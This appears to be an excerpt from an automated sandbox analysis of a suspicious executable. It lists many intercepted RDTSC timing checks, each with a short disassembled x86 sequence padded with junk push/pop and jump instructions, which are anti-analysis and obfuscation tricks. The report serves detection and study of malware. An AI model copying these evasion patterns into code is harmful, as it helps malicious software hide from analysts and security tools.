                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052810 second address: 1052837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF40430h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007F72FCF40426h 0x00000015 jl 00007F72FCF40426h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A34 second address: 1052A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C27 second address: 1052C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054BC1 second address: 1054BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCD84E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72FCD84E8Ch 0x0000000f jns 00007F72FCD84E86h 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053B12 second address: 1053B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053B16 second address: 1053B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055259 second address: 1055263 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72FCF40426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053B1A second address: 1053B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055263 second address: 1055292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF4042Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72FCF40437h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055292 second address: 1055296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105611E second address: 1056124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055986 second address: 105598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056124 second address: 105617A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F72FCF40428h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 call 00007F72FCF4042Ah 0x00000027 mov dword ptr [ebp+122D29D7h], edi 0x0000002d pop esi 0x0000002e push 00000000h 0x00000030 mov edi, 75472E60h 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D2F5Eh], eax 0x0000003d mov esi, dword ptr [ebp+122D2F39h] 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007F72FCF40426h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105598A second address: 1055990 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105617A second address: 105617E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105617E second address: 105618D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F72FCD84E86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055990 second address: 10559B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF40431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F72FCF40426h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10575F8 second address: 105760C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F72FCD84E8Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105760C second address: 10576B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F72FCF40426h 0x0000000b jmp 00007F72FCF40435h 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F72FCF40428h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d jmp 00007F72FCF40438h 0x00000032 sub edi, dword ptr [ebp+124680D2h] 0x00000038 push 00000000h 0x0000003a call 00007F72FCF4042Ah 0x0000003f jl 00007F72FCF40438h 0x00000045 jmp 00007F72FCF40432h 0x0000004a pop edi 0x0000004b push 00000000h 0x0000004d sub dword ptr [ebp+1245777Dh], ecx 0x00000053 xor edi, 4177F778h 0x00000059 xchg eax, ebx 0x0000005a jnc 00007F72FCF4042Eh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10576B9 second address: 10576BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10576BD second address: 10576C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F72FCF40426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E482 second address: 108E486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E486 second address: 108E4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F72FCF2ACD9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E4A9 second address: 108E4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E4AD second address: 108E4B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72FCF2ACC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D657 second address: 108D65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D65B second address: 108D665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F72FCF2ACC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D665 second address: 108D66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D66E second address: 108D693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF2ACD9h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D693 second address: 108D699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D699 second address: 108D6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F72FCF2ACDBh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D862 second address: 108D86A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D9F0 second address: 108D9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D9F4 second address: 108D9FE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72FCC0D446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D9FE second address: 108DA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F72FCF2ACC6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DB66 second address: 108DB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72FCC0D446h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DB74 second address: 108DB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F72FCF2ACCCh 0x0000000f jbe 00007F72FCF2ACC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD2D second address: 108DD53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F72FCC0D458h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F72FCC0D452h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD53 second address: 108DD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F72FCF2ACC6h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD60 second address: 108DD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F72FCC0D45Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DD84 second address: 108DD95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F72FCF2ACC6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DEC5 second address: 108DEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108DEC9 second address: 108DEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F72FCF2ACD2h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F72FCF2ACCFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E328 second address: 108E332 instructions: 0x00000000 rdtsc 0x00000002 js 00007F72FCC0D44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E332 second address: 108E33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F72FCF2ACCCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA1C second address: 108CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D455h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA35 second address: 108CA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA39 second address: 108CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA3F second address: 108CA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF2ACCAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA4F second address: 108CA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA5E second address: 108CA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA62 second address: 108CA7B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCC0D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F72FCC0D44Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CA7B second address: 108CA8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092BF2 second address: 1092BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932E1 second address: 10932F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F72FCF2ACD0h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932F6 second address: 10932FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932FB second address: 109331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F72FCF2ACD1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10938E7 second address: 10938F9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F72FCC0D44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10981A0 second address: 10981A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10194EC second address: 10194FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F72FCC0D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10194FB second address: 101950B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF2ACCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AD3B second address: 109AD55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F72FCC0D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F72FCC0D44Eh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jns 00007F72FCC0D446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CF08 second address: 109CF0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006B29 second address: 1006B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F72FCC0D44Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006B3C second address: 1006B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACCFh 0x00000007 jmp 00007F72FCF2ACD5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0F1E second address: 10A0F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0F22 second address: 10A0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F72FCF2ACC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0F31 second address: 10A0F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A108C second address: 10A10BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F72FCF2ACDCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F72FCF2ACCEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1575 second address: 10A1579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1579 second address: 10A1596 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72FCF2ACC6h 0x00000008 jns 00007F72FCF2ACC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F72FCF2ACCBh 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1596 second address: 10A15AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCC0D453h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A15AD second address: 10A15B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5E3E second address: 10A5E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5FA3 second address: 10A5FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCF2ACD8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5FC0 second address: 10A5FC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5FC5 second address: 10A5FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A63F4 second address: 10A640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D454h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CB74 second address: 105CB85 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72FCF2ACC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA8BF second address: 10AA8CF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72FCC0D448h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA8CF second address: 10AA8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1EC6 second address: 10B1EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F72FCC0D456h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEA8 second address: 10AFEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEAC second address: 10AFEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCC0D44Ch 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jne 00007F72FCC0D446h 0x00000014 jmp 00007F72FCC0D44Bh 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B003D second address: 10B0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0049 second address: 10B004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B004F second address: 10B0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0054 second address: 10B0059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B01B8 second address: 10B01CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B07B0 second address: 10B07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B07B6 second address: 10B07EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F72FCF2ACD2h 0x0000000b popad 0x0000000c push edx 0x0000000d jmp 00007F72FCF2ACCCh 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F72FCF2ACCCh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7D53 second address: 10B7D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7D57 second address: 10B7D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F72FCF2ACC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F72FCF2ACCEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6F5B second address: 10B6F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
